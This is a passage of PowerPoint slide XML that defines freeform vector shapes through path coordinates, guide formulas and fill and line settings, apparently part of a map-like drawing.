                  <a:gd name="T20" fmla="*/ 0 w 30"/>
                  <a:gd name="T21" fmla="*/ 12 h 37"/>
                  <a:gd name="T22" fmla="*/ 2 w 30"/>
                  <a:gd name="T23" fmla="*/ 11 h 37"/>
                  <a:gd name="T24" fmla="*/ 3 w 30"/>
                  <a:gd name="T25" fmla="*/ 11 h 37"/>
                  <a:gd name="T26" fmla="*/ 3 w 30"/>
                  <a:gd name="T27" fmla="*/ 9 h 37"/>
                  <a:gd name="T28" fmla="*/ 4 w 30"/>
                  <a:gd name="T29" fmla="*/ 7 h 37"/>
                  <a:gd name="T30" fmla="*/ 5 w 30"/>
                  <a:gd name="T31" fmla="*/ 5 h 37"/>
                  <a:gd name="T32" fmla="*/ 7 w 30"/>
                  <a:gd name="T33" fmla="*/ 5 h 37"/>
                  <a:gd name="T34" fmla="*/ 8 w 30"/>
                  <a:gd name="T35" fmla="*/ 6 h 37"/>
                  <a:gd name="T36" fmla="*/ 9 w 30"/>
                  <a:gd name="T37" fmla="*/ 7 h 37"/>
                  <a:gd name="T38" fmla="*/ 9 w 30"/>
                  <a:gd name="T39" fmla="*/ 5 h 37"/>
                  <a:gd name="T40" fmla="*/ 8 w 30"/>
                  <a:gd name="T41" fmla="*/ 2 h 37"/>
                  <a:gd name="T42" fmla="*/ 8 w 30"/>
                  <a:gd name="T43" fmla="*/ 1 h 37"/>
                  <a:gd name="T44" fmla="*/ 10 w 30"/>
                  <a:gd name="T45" fmla="*/ 1 h 37"/>
                  <a:gd name="T46" fmla="*/ 12 w 30"/>
                  <a:gd name="T47" fmla="*/ 0 h 37"/>
                  <a:gd name="T48" fmla="*/ 12 w 30"/>
                  <a:gd name="T49" fmla="*/ 2 h 37"/>
                  <a:gd name="T50" fmla="*/ 15 w 30"/>
                  <a:gd name="T51" fmla="*/ 3 h 37"/>
                  <a:gd name="T52" fmla="*/ 17 w 30"/>
                  <a:gd name="T53" fmla="*/ 5 h 37"/>
                  <a:gd name="T54" fmla="*/ 19 w 30"/>
                  <a:gd name="T55" fmla="*/ 8 h 37"/>
                  <a:gd name="T56" fmla="*/ 20 w 30"/>
                  <a:gd name="T57" fmla="*/ 8 h 37"/>
                  <a:gd name="T58" fmla="*/ 22 w 30"/>
                  <a:gd name="T59" fmla="*/ 10 h 37"/>
                  <a:gd name="T60" fmla="*/ 23 w 30"/>
                  <a:gd name="T61" fmla="*/ 9 h 37"/>
                  <a:gd name="T62" fmla="*/ 24 w 30"/>
                  <a:gd name="T63" fmla="*/ 11 h 37"/>
                  <a:gd name="T64" fmla="*/ 25 w 30"/>
                  <a:gd name="T65" fmla="*/ 12 h 37"/>
                  <a:gd name="T66" fmla="*/ 27 w 30"/>
                  <a:gd name="T67" fmla="*/ 12 h 37"/>
                  <a:gd name="T68" fmla="*/ 28 w 30"/>
                  <a:gd name="T69" fmla="*/ 13 h 37"/>
                  <a:gd name="T70" fmla="*/ 30 w 30"/>
                  <a:gd name="T71" fmla="*/ 15 h 37"/>
                  <a:gd name="T72" fmla="*/ 29 w 30"/>
                  <a:gd name="T73" fmla="*/ 16 h 37"/>
                  <a:gd name="T74" fmla="*/ 28 w 30"/>
                  <a:gd name="T75" fmla="*/ 17 h 37"/>
                  <a:gd name="T76" fmla="*/ 27 w 30"/>
                  <a:gd name="T77" fmla="*/ 18 h 37"/>
                  <a:gd name="T78" fmla="*/ 25 w 30"/>
                  <a:gd name="T79" fmla="*/ 17 h 37"/>
                  <a:gd name="T80" fmla="*/ 24 w 30"/>
                  <a:gd name="T81" fmla="*/ 18 h 37"/>
                  <a:gd name="T82" fmla="*/ 25 w 30"/>
                  <a:gd name="T83" fmla="*/ 19 h 37"/>
                  <a:gd name="T84" fmla="*/ 26 w 30"/>
                  <a:gd name="T85" fmla="*/ 20 h 37"/>
                  <a:gd name="T86" fmla="*/ 22 w 30"/>
                  <a:gd name="T87" fmla="*/ 23 h 37"/>
                  <a:gd name="T88" fmla="*/ 15 w 30"/>
                  <a:gd name="T89" fmla="*/ 24 h 37"/>
                  <a:gd name="T90" fmla="*/ 14 w 30"/>
                  <a:gd name="T91" fmla="*/ 33 h 37"/>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30"/>
                  <a:gd name="T139" fmla="*/ 0 h 37"/>
                  <a:gd name="T140" fmla="*/ 30 w 30"/>
                  <a:gd name="T141" fmla="*/ 37 h 37"/>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30" h="37">
                    <a:moveTo>
                      <a:pt x="14" y="37"/>
                    </a:moveTo>
                    <a:lnTo>
                      <a:pt x="14" y="36"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="11" y="35"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="11" y="33"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="7" y="29"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1" y="26"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1" y="25"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1" y="24"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="0" y="23"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="0" y="22"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="0" y="21"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1" y="20"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="2" y="19"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1" y="18"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="0" y="17"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="0" y="16"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="0" y="15"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="0" y="14"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="0" y="12"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1" y="11"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="2" y="11"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="3" y="11"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="3" y="10"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="3" y="9"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="4" y="8"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="4" y="7"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="4" y="6"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="5" y="5"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="6" y="5"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="7" y="5"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="8" y="5"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="8" y="6"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="9" y="7"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="10" y="6"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="9" y="5"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="9" y="3"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="8" y="2"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="8" y="1"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="9" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="10" y="1"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="12" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="12" y="1"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="12" y="2"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="14" y="2"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="15" y="3"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="16" y="4"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="17" y="5"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="17" y="7"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="19" y="8"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="20" y="8"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="21" y="9"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="22" y="10"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="23" y="10"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="23" y="9"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="24" y="10"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="24" y="11"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="25" y="12"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="26" y="13"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="27" y="12"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="27" y="13"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="28" y="13"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="29" y="14"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="30" y="15"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="30" y="16"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="29" y="16"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="28" y="16"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="28" y="17"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="27" y="18"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="26" y="17"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="25" y="17"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="24" y="17"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="24" y="18"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="25" y="19"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="26" y="19"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="26" y="20"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="25" y="23"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="22" y="23"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="17" y="22"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="15" y="24"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="13" y="29"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="14" y="33"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="14" y="37"/>
                    </a:lnTo>
                    <a:close/>
                  </a:path>
                </a:pathLst>
              </a:custGeom>
              <a:noFill/>
              <a:ln w="2" cap="rnd">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:round/>
                <a:headEnd/>
                <a:tailEnd/>
              </a:ln>
            </p:spPr>
            <p:txBody>
              <a:bodyPr/>
              <a:lstStyle/>
              <a:p>
                <a:endParaRPr lang="en-US"/>
              </a:p>
            </p:txBody>
          </p:sp>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="35884" name="Freeform 418"/>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="2951" y="2101"/>
                <a:ext cx="51" cy="33"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 12 w 51"/>
                  <a:gd name="T1" fmla="*/ 10 h 33"/>
                  <a:gd name="T2" fmla="*/ 23 w 51"/>
                  <a:gd name="T3" fmla="*/ 7 h 33"/>
                  <a:gd name="T4" fmla="*/ 35 w 51"/>
                  <a:gd name="T5" fmla="*/ 4 h 33"/>
                  <a:gd name="T6" fmla="*/ 46 w 51"/>
                  <a:gd name="T7" fmla="*/ 0 h 33"/>
                  <a:gd name="T8" fmla="*/ 51 w 51"/>
                  <a:gd name="T9" fmla="*/ 9 h 33"/>
                  <a:gd name="T10" fmla="*/ 48 w 51"/>
                  <a:gd name="T11" fmla="*/ 8 h 33"/>
                  <a:gd name="T12" fmla="*/ 46 w 51"/>
                  <a:gd name="T13" fmla="*/ 10 h 33"/>
                  <a:gd name="T14" fmla="*/ 46 w 51"/>
                  <a:gd name="T15" fmla="*/ 11 h 33"/>
                  <a:gd name="T16" fmla="*/ 44 w 51"/>
                  <a:gd name="T17" fmla="*/ 12 h 33"/>
                  <a:gd name="T18" fmla="*/ 42 w 51"/>
                  <a:gd name="T19" fmla="*/ 14 h 33"/>
                  <a:gd name="T20" fmla="*/ 39 w 51"/>
                  <a:gd name="T21" fmla="*/ 14 h 33"/>
                  <a:gd name="T22" fmla="*/ 37 w 51"/>
                  <a:gd name="T23" fmla="*/ 15 h 33"/>
                  <a:gd name="T24" fmla="*/ 36 w 51"/>
                  <a:gd name="T25" fmla="*/ 17 h 33"/>
                  <a:gd name="T26" fmla="*/ 37 w 51"/>
                  <a:gd name="T27" fmla="*/ 19 h 33"/>
                  <a:gd name="T28" fmla="*/ 38 w 51"/>
                  <a:gd name="T29" fmla="*/ 21 h 33"/>
                  <a:gd name="T30" fmla="*/ 37 w 51"/>
                  <a:gd name="T31" fmla="*/ 24 h 33"/>
                  <a:gd name="T32" fmla="*/ 35 w 51"/>
                  <a:gd name="T33" fmla="*/ 24 h 33"/>
                  <a:gd name="T34" fmla="*/ 33 w 51"/>
                  <a:gd name="T35" fmla="*/ 25 h 33"/>
                  <a:gd name="T36" fmla="*/ 31 w 51"/>
                  <a:gd name="T37" fmla="*/ 26 h 33"/>
                  <a:gd name="T38" fmla="*/ 32 w 51"/>
                  <a:gd name="T39" fmla="*/ 27 h 33"/>
                  <a:gd name="T40" fmla="*/ 32 w 51"/>
                  <a:gd name="T41" fmla="*/ 29 h 33"/>
                  <a:gd name="T42" fmla="*/ 31 w 51"/>
                  <a:gd name="T43" fmla="*/ 29 h 33"/>
                  <a:gd name="T44" fmla="*/ 31 w 51"/>
                  <a:gd name="T45" fmla="*/ 32 h 33"/>
                  <a:gd name="T46" fmla="*/ 30 w 51"/>
                  <a:gd name="T47" fmla="*/ 33 h 33"/>
                  <a:gd name="T48" fmla="*/ 28 w 51"/>
                  <a:gd name="T49" fmla="*/ 33 h 33"/>
                  <a:gd name="T50" fmla="*/ 26 w 51"/>
                  <a:gd name="T51" fmla="*/ 32 h 33"/>
                  <a:gd name="T52" fmla="*/ 25 w 51"/>
                  <a:gd name="T53" fmla="*/ 32 h 33"/>
                  <a:gd name="T54" fmla="*/ 23 w 51"/>
                  <a:gd name="T55" fmla="*/ 32 h 33"/>
                  <a:gd name="T56" fmla="*/ 21 w 51"/>
                  <a:gd name="T57" fmla="*/ 30 h 33"/>
                  <a:gd name="T58" fmla="*/ 20 w 51"/>
                  <a:gd name="T59" fmla="*/ 29 h 33"/>
                  <a:gd name="T60" fmla="*/ 20 w 51"/>
                  <a:gd name="T61" fmla="*/ 28 h 33"/>
                  <a:gd name="T62" fmla="*/ 19 w 51"/>
                  <a:gd name="T63" fmla="*/ 29 h 33"/>
                  <a:gd name="T64" fmla="*/ 18 w 51"/>
                  <a:gd name="T65" fmla="*/ 31 h 33"/>
                  <a:gd name="T66" fmla="*/ 17 w 51"/>
                  <a:gd name="T67" fmla="*/ 32 h 33"/>
                  <a:gd name="T68" fmla="*/ 14 w 51"/>
                  <a:gd name="T69" fmla="*/ 32 h 33"/>
                  <a:gd name="T70" fmla="*/ 12 w 51"/>
                  <a:gd name="T71" fmla="*/ 32 h 33"/>
                  <a:gd name="T72" fmla="*/ 10 w 51"/>
                  <a:gd name="T73" fmla="*/ 31 h 33"/>
                  <a:gd name="T74" fmla="*/ 10 w 51"/>
                  <a:gd name="T75" fmla="*/ 32 h 33"/>
                  <a:gd name="T76" fmla="*/ 8 w 51"/>
                  <a:gd name="T77" fmla="*/ 32 h 33"/>
                  <a:gd name="T78" fmla="*/ 7 w 51"/>
                  <a:gd name="T79" fmla="*/ 33 h 33"/>
                  <a:gd name="T80" fmla="*/ 3 w 51"/>
                  <a:gd name="T81" fmla="*/ 32 h 33"/>
                  <a:gd name="T82" fmla="*/ 7 w 51"/>
                  <a:gd name="T83" fmla="*/ 28 h 33"/>
                  <a:gd name="T84" fmla="*/ 4 w 51"/>
                  <a:gd name="T85" fmla="*/ 21 h 33"/>
                  <a:gd name="T86" fmla="*/ 3 w 51"/>
                  <a:gd name="T87" fmla="*/ 15 h 33"/>
                  <a:gd name="T88" fmla="*/ 4 w 51"/>
                  <a:gd name="T89" fmla="*/ 11 h 33"/>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51"/>
                  <a:gd name="T136" fmla="*/ 0 h 33"/>
                  <a:gd name="T137" fmla="*/ 51 w 51"/>
                  <a:gd name="T138" fmla="*/ 33 h 33"/>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51" h="33">
                    <a:moveTo>
                      <a:pt x="3" y="8"/>
                    </a:moveTo>
                    <a:lnTo>
                      <a:pt x="11" y="9"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="12" y="10"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="16" y="10"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="19" y="12"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="23" y="7"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="27" y="5"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="33" y="6"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="35" y="4"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="42" y="5"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="41" y="1"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="46" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="48" y="6"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="51" y="9"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="50" y="9"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="49" y="8"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="48" y="8"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="47" y="8"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="46" y="9"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="46" y="10"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="46" y="11"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="45" y="11"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="44" y="11"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="44" y="12"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="43" y="13"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="42" y="14"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="41" y="14"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="40" y="14"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="39" y="14"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="39" y="15"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="38" y="15"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="37" y="15"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="36" y="16"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="36" y="17"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="36" y="18"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="37" y="19"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="37" y="20"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="38" y="21"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="37" y="22"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="37" y="23"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="37" y="24"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="36" y="24"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="35" y="24"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="34" y="24"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="33" y="25"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="32" y="25"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="31" y="26"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="31" y="27"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="32" y="27"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="32" y="28"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="32" y="29"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="31" y="29"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="31" y="30"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="31" y="31"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="31" y="32"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="31" y="33"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="30" y="33"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="29" y="33"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="28" y="33"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="27" y="32"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="26" y="32"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="25" y="31"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="25" y="32"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="24" y="32"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="23" y="32"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="22" y="31"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="21" y="31"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="21" y="30"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="20" y="29"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="20" y="28"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="19" y="28"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="19" y="29"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="18" y="30"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="18" y="31"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="17" y="31"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="17" y="32"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="15" y="32"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="14" y="32"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="13" y="32"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="12" y="32"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="11" y="32"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="11" y="31"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="10" y="31"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="10" y="32"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="10" y="33"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="9" y="33"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="8" y="32"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="7" y="33"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="6" y="33"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="5" y="33"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="3" y="32"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="6" y="32"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="7" y="30"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="7" y="28"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="5" y="26"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="3" y="25"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="4" y="21"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1" y="20"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="4" y="17"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="3" y="15"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1" y="15"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="0" y="14"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="4" y="11"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="3" y="8"/>
                    </a:lnTo>
                    <a:close/>
                  </a:path>
                </a:pathLst>
              </a:custGeom>
              <a:solidFill>
                <a:srgbClr val="96AFCF"/>
              </a:solidFill>
              <a:ln w="9525">
                <a:noFill/>
                <a:round/>
                <a:headEnd/>
                <a:tailEnd/>
              </a:ln>
            </p:spPr>
            <p:txBody>
              <a:bodyPr/>
              <a:lstStyle/>
              <a:p>
                <a:endParaRPr lang="en-US"/>
              </a:p>
            </p:txBody>
          </p:sp>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="35885" name="Freeform 419"/>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="2951" y="2101"/>
                <a:ext cx="51" cy="33"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 12 w 51"/>
                  <a:gd name="T1" fmla="*/ 10 h 33"/>
                  <a:gd name="T2" fmla="*/ 23 w 51"/>
                  <a:gd name="T3" fmla="*/ 7 h 33"/>
                  <a:gd name="T4" fmla="*/ 35 w 51"/>
                  <a:gd name="T5" fmla="*/ 4 h 33"/>
                  <a:gd name="T6" fmla="*/ 46 w 51"/>
                  <a:gd name="T7" fmla="*/ 0 h 33"/>
                  <a:gd name="T8" fmla="*/ 51 w 51"/>
                  <a:gd name="T9" fmla="*/ 9 h 33"/>
                  <a:gd name="T10" fmla="*/ 48 w 51"/>
                  <a:gd name="T11" fmla="*/ 8 h 33"/>
                  <a:gd name="T12" fmla="*/ 46 w 51"/>
                  <a:gd name="T13" fmla="*/ 10 h 33"/>
                  <a:gd name="T14" fmla="*/ 46 w 51"/>
                  <a:gd name="T15" fmla="*/ 11 h 33"/>
                  <a:gd name="T16" fmla="*/ 44 w 51"/>
                  <a:gd name="T17" fmla="*/ 12 h 33"/>
                  <a:gd name="T18" fmla="*/ 42 w 51"/>
                  <a:gd name="T19" fmla="*/ 14 h 33"/>
                  <a:gd name="T20" fmla="*/ 39 w 51"/>
                  <a:gd name="T21" fmla="*/ 14 h 33"/>
                  <a:gd name="T22" fmla="*/ 37 w 51"/>
                  <a:gd name="T23" fmla="*/ 15 h 33"/>
                  <a:gd name="T24" fmla="*/ 36 w 51"/>
                  <a:gd name="T25" fmla="*/ 17 h 33"/>
                  <a:gd name="T26" fmla="*/ 37 w 51"/>
                  <a:gd name="T27" fmla="*/ 19 h 33"/>
                  <a:gd name="T28" fmla="*/ 38 w 51"/>
                  <a:gd name="T29" fmla="*/ 21 h 33"/>
                  <a:gd name="T30" fmla="*/ 37 w 51"/>
                  <a:gd name="T31" fmla="*/ 24 h 33"/>
                  <a:gd name="T32" fmla="*/ 35 w 51"/>
                  <a:gd name="T33" fmla="*/ 24 h 33"/>
                  <a:gd name="T34" fmla="*/ 33 w 51"/>
                  <a:gd name="T35" fmla="*/ 25 h 33"/>
                  <a:gd name="T36" fmla="*/ 31 w 51"/>
                  <a:gd name="T37" fmla="*/ 26 h 33"/>
                  <a:gd name="T38" fmla="*/ 32 w 51"/>
                  <a:gd name="T39" fmla="*/ 27 h 33"/>
                  <a:gd name="T40" fmla="*/ 32 w 51"/>
                  <a:gd name="T41" fmla="*/ 29 h 33"/>
                  <a:gd name="T42" fmla="*/ 31 w 51"/>
                  <a:gd name="T43" fmla="*/ 29 h 33"/>
                  <a:gd name="T44" fmla="*/ 31 w 51"/>
                  <a:gd name="T45" fmla="*/ 32 h 33"/>
                  <a:gd name="T46" fmla="*/ 30 w 51"/>
                  <a:gd name="T47" fmla="*/ 33 h 33"/>
                  <a:gd name="T48" fmla="*/ 28 w 51"/>
                  <a:gd name="T49" fmla="*/ 33 h 33"/>
                  <a:gd name="T50" fmla="*/ 26 w 51"/>
                  <a:gd name="T51" fmla="*/ 32 h 33"/>
                  <a:gd name="T52" fmla="*/ 25 w 51"/>
                  <a:gd name="T53" fmla="*/ 32 h 33"/>
                  <a:gd name="T54" fmla="*/ 23 w 51"/>
                  <a:gd name="T55" fmla="*/ 32 h 33"/>
                  <a:gd name="T56" fmla="*/ 21 w 51"/>
                  <a:gd name="T57" fmla="*/ 30 h 33"/>
                  <a:gd name="T58" fmla="*/ 20 w 51"/>
                  <a:gd name="T59" fmla="*/ 29 h 33"/>
                  <a:gd name="T60" fmla="*/ 20 w 51"/>
